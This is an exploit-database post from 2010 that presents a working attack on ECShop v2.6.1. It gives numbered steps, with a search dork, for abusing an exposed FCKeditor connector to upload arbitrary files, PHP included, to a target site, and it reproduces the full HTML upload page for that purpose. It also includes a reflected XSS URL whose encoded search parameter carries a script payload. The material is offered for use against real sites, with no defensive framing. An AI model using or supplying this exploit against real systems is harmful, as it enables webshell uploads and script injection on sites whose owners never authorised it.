ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit
Posted on 22 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit ========================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ####################################### 1 0 I'm indoushka member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Vendor: http://www.ecshop.com/ # Date: 2010-05-27 # Author : indoushka # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Home : www.sec4ever.com # Bug : Remote Upload File Exploit / XSS # Tested on : windows SP2 Français V.(Pnx2 2.0) # Dork : Powered By Alegro Cart # Exploit By indoushka 1 - [~] 1.Save code html format [~] 2.Search Target.com [~] 3.Edit and replace & Target [~] 4.Save Html Page [~] 5.Open Page Html (Edite Source) [~] 6.Set Format PHP [~] 7.Choose File & Upload [~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....) [~] 9.Target.com/images/uploads/File/File Name 2 - code html format <head> <title>FCKeditor - Connectors Tests</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript"> // Automatically detect the correct document.domain (#1919). (function() { var d = document.domain ; while ( true ) { // Test if we can access a parent property. try { var test = window.opener.document.domain ; break ; } catch( e ) {} // Remove a domain part: www.mytest.example.com => mytest.example.com => example.com ... d = d.replace( /.*?(?:.|$)/, '' ) ; if ( d.length == 0 ) break ; // It was not able to detect the domain. try { document.domain = d ; } catch (e) { break ; } } })() ; function BuildBaseUrl( command ) { var sUrl = document.getElementById('cmbConnector').value + '?Command=' + command + '&Type=' + document.getElementById('cmbType').value + '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ; return sUrl ; } function SetFrameUrl( url ) { document.getElementById('eRunningFrame').src = url ; document.getElementById('eUrl').innerHTML = url ; } function GetFolders() { SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ; return false ; } function GetFoldersAndFiles() { SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ; return false ; } function CreateFolder() { var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ; if ( ! sFolder ) return false ; var sUrl = BuildBaseUrl( 'CreateFolder' ) ; sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ; SetFrameUrl( sUrl ) ; return false ; } function OnUploadCompleted( errorNumber, fileName ) { switch ( errorNumber ) { case 0 : alert( 'File uploaded with no errors' ) ; break ; case 201 : GetFoldersAndFiles() ; alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ; break ; case 202 : alert( 'Invalid file' ) ; break ; default : alert( 'Error on file upload. Error number: ' + errorNumber ) ; break ; } } this.frames.frmUpload = this ; function SetAction() { var sUrl = BuildBaseUrl( 'FileUpload' ) ; document.getElementById('eUrl').innerHTML = sUrl ; document.getElementById('frmUpload').action = sUrl ; } </script> </head> <body> <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> <tr> <td> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td> Connector:<br /> <select id="cmbConnector" name="cmbConnector"> <option value="asp/connector.asp" selected="selected">ASP</option> <option value="aspx/connector.aspx">ASP.Net</option> <option value="cfm/connector.cfm">ColdFusion</option> <option value="lasso/connector.lasso">Lasso</option> <option value="perl/connector.cgi">Perl</option> <option value="php/connector.php">PHP</option> <option value="py/connector.py">Python</option> </select> </td> <td> &nbsp;&nbsp;&nbsp;</td> <td> Current Folder<br /> <input id="txtFolder" type="text" value="/" name="txtFolder" /></td> <td> &nbsp;&nbsp;&nbsp;</td> <td> Resource Type<br /> <select id="cmbType" name="cmbType"> <option value="File" selected="selected">File</option> <option value="Image">Image</option> <option value="Flash">Flash</option> <option value="Media">Media</option> <option value="Invalid">Invalid Type (for testing)</option> </select> </td> </tr> </table> <br /> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td valign="top"> <a href="#" onclick="GetFolders();">Get Folders</a></td> <td> &nbsp;&nbsp;&nbsp;</td> <td valign="top"> <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td> <td> &nbsp;&nbsp;&nbsp;</td> <td valign="top"> <a href="#" onclick="CreateFolder();">Create Folder</a></td> <td> &nbsp;&nbsp;&nbsp;</td> <td valign="top"> <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data"> File Upload<br /> <input id="txtFileUpload" type="file" name="NewFile" /> <input type="submit" value="Upload" onclick="SetAction();" /> </form> </td> </tr> </table> <br /> URL: <span id="eUrl"></span> </td> </tr> <tr> <td height="100%" valign="top"> <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" height="100%"></iframe> </td> </tr> </table> </body> </html> 2 - http://localhost:8080/search.php?encode=YToxMzp7czo4OiJjYXRlZ29yeSI7czoxOiIwIjtzOjg6ImtleXdvcmRzIjtzOjEyOiLmkanmiZjnvZfmi4kiO3M6NToiaW50cm8iO3M6Mzc6IjE%2bIj48U2NSaVB0IA0KPmFsZXJ0KDQyNTI1KTs8L1NjUmlQdD4iO3M6NToiYnJhbmQiO3M6MToiMCI7czo0OiJzb3J0IjtzOjg6Imdvb2RzX2lkIjtzOjU6Im9yZGVyIjtzOjQ6IkRFU0MiO3M6OToibWluX3ByaWNlIjtzOjE6IjAiO3M6OToibWF4X3ByaWNlIjtzOjE6IjAiO3M6NjoiYWN0aW9uIjtzOjE6IjEiO3M6MTA6Imdvb2RzX3R5cGUiO3M6MToiMCI7czo1OiJzY19kcyI7czoxOiIwIjtzOjQ6InBhZ2UiO3M6MToiMiI7czoxODoic2VhcmNoX2VuY29kZV90aW1lIjtpOjEyNzYwODcyODY7fQ== Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== all my friend : His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N (cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te --------------------------------------------------------------------------------------------------------------------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
